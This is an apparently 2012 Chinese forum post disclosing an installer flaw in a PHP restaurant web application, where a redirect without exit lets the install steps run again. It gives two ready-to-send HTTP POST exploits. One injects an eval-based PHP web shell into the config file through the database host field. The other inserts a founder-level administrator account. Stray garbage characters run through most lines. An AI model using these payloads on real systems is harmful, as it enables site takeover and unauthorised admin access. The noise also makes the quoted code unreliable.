问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
/ s, A9 p, Q1 \+ ]. K! k( {) h% `6 V- l! d3 Q5 j4 Z# R
<?php
+ y, |; d2 ]4 Q+ X$ X5 Uif(file_exists("../install.lock"))0 q. _& l8 c) l4 g
{1 k* F/ G, h; Y* g
header("Location: ../");//没有退出8 t$ G% t: d& M& y7 T
}$ j5 S6 w! ]& p* v
3 V: v5 Y* L2 G% K, n) |//echo 'tst';exit;
% c" [( j2 {5 {( w' \; s4 rrequire_once("init.php");
9 a8 I! g+ F+ Bif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
o1 J! c: X& k% f2 Y: g{2 v1 j0 y1 s& C* X6 F }# ~# K3 I2 y9 d
可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。9 V+ G- E5 E: n. s* Z+ C9 {' u
" h' ]8 q. b2 Y- z3 O1、getshell(很危险)
" o5 e* h6 L% V1 K: ]. kif(empty($_REQUEST['step']) || $_REQUEST['step']==1). c' m7 W1 C; w X5 o4 g
{
( K/ H0 b: ]9 K7 Z/ G F: u$smarty->assign("step",1);
9 I8 }5 Z3 G; I) Q8 g+ P0 S$smarty->display("index.html"); f0 L, V) `6 @. D
}elseif($_REQUEST['step']==2)
( `: T5 K+ j3 [3 O{$ `8 Y, g% A U& z: R
$mysql_host=trim($_POST['mysql_host']);
" x. X0 M* i1 c& E2 b $mysql_user=trim($_POST['mysql_user']);
( t4 t, j5 O7 T0 j5 Q9 N: U $mysql_pwd=trim($_POST['mysql_pwd']);
/ I# c8 ]" l/ k# o+ N1 C: {& Q7 N $mysql_db=trim($_POST['mysql_db']);& G6 K+ q [9 U( H6 n/ X* d/ ]2 [ {
$tblpre=trim($_POST['tblpre']);5 J* i2 C) q Q- S v
$domain==trim($_POST['domain']);2 L& l3 x6 [7 T" _% X6 k2 S
$str="<?php \r\n";6 M1 E9 ?# O7 K
$str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";) H# D" b4 h& w' z! [
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";# X k+ J8 m5 P K/ _3 W5 h
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
8 n* E' q5 o; J K; e* C; Q $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";8 R! I9 u- N, S- x& M
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
$ h/ g! r6 Z# B" A0 g2 s1 H% P $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";4 d: a* ^ o* G& L3 N Q
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
" O8 _2 N# J" F" U' h/ } N% j# H* t $str.='define("SKINS","default");'."\r\n";. p# X/ |2 ?9 Y
$str.='?>';8 z# K+ l1 O, T3 t' ]- H' R& u$ q
file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
3 Y) g( I5 R# K" m; p% R% u上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马
8 g9 d: j0 e* Y8 U! ]POST /canting/install/index.php?m=index&step=2 HTTP/1.1; A) U% T- |2 W7 Y- w
Host: 192.168.80.129
" Y& q! \) y! M; T/ ?3 aUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0& v& e$ i7 m) W$ E9 E; ?/ Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
: m! |- k) O* O) g( N `) P" b- Q$ c' AAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.33 O9 V) L- |9 h2 q/ L4 r
Accept-Encoding: gzip, deflate
c; G0 `: @# f" lReferer: http://192.168.80.129/canting/install/index.php?step=1
: R. Q# r- v2 m$ gCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42" }* Q9 e! j5 D+ G% P
Content-Type: application/x-www-form-urlencoded& r- ^. |) b1 i- e% l0 [6 w/ d1 I5 w
Content-Length: 126
& U2 _) K/ J. O" I" m & L6 L/ R. K1 m( q" C
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD, J5 `' U0 e- a6 w- m. G! d' y. v
但是这个方法很危险,将导致网站无法运行。
3 u+ H0 L! H3 m2 k. p1 @0 B' X" b; y
2 d) x; ~* M4 i2、直接添加管理员
% T2 I" V9 R/ [$ K
0 c: c" \' n+ v+ o" [- Velseif($_REQUEST['step']==5)
1 Q6 |$ ~' `2 U6 h$ ?{) _4 t; u& M5 k; S
if($_POST)
$ {7 n" X( X/ b2 O { require_once("../config/config.inc.php");* `. ?# c O3 j5 w) r+ {
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
/ V0 _8 I( O5 h7 Y* u mysql_select_db(MYSQL_DB,$link);
* e5 H0 k/ \1 M8 \2 I! k- F mysql_query("SET NAMES ".MYSQL_CHARSET );
, T+ g* E. H0 `& j5 E7 W8 S mysql_query("SET sql_mode=''");$ V& M. I; _2 ?4 g+ j
4 F' p, C4 M& |# a# @
$adminname=trim($_POST['adminname']);% v; @% Y6 \6 o$ [
$pwd1=trim($_POST['pwd1']);
* B L7 Z* U N! | $pwd2=trim($_POST['pwd2']);5 k4 @, A! E1 K6 n9 k1 E5 `) ?
if(empty($adminname))
9 s/ {* I2 n5 F S9 ^9 { {) @3 M4 H% z$ Y2 s# ]) C7 X2 D
+ R$ H8 f6 I' \ echo "<script>alert('管理员不能为空');history.go(-1);</script>";6 u9 [7 z0 t# C% W4 m# F, T
exit();
: ^' c; d) {4 @3 H5 p/ D @) | }
/ A# T4 i( v- g if(($pwd1!=$pwd2) or empty($pwd1))1 }6 [. V/ Q. O O
{1 J+ r; A, T! g# h/ h* |
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出( L$ C8 V* m; a
}
| @. W r+ O# w. a; \ mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员. R0 b, W( J( E' l
}" f: P) j- A2 Z1 i1 H) s
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
6 `* b* t* T5 M/ w* w* c9 LPOST /canting/install/index.php?m=index&step=5 HTTP/1.1' @, D$ `0 S% u0 N8 a4 Z
Host: 192.168.80.129; \" C: h& t6 _/ b% y
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
3 T& `* G7 |$ R! A) o4 F; m5 t7 E6 OAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
, D) c; { p# W; @; a* qAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
$ s2 _2 D' B! Q1 D6 p+ QAccept-Encoding: gzip, deflate
, A, k" M" n# ?8 J& ~Referer: http://www.2cto.com /canting/install/index.php?step=1
1 r+ I9 _2 b; `$ K+ H7 ]- I7 |Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42( `, C4 `" f3 o5 [9 q0 B' o+ G
Content-Type: application/x-www-form-urlencoded
8 R# e) O4 S Q- X, P7 @Content-Length: 465 O @/ ~# y. [% ~, L+ M5 K
: Q9 {) I! o5 A% K, E; l( Padminname=qingshen&pwd1=qingshen&pwd2=qingshen
$ t# I- Y) T+ ~' H3 C: ~4 C7 H |
发表于 2012-12-4 11:13:44
收藏
支持
反对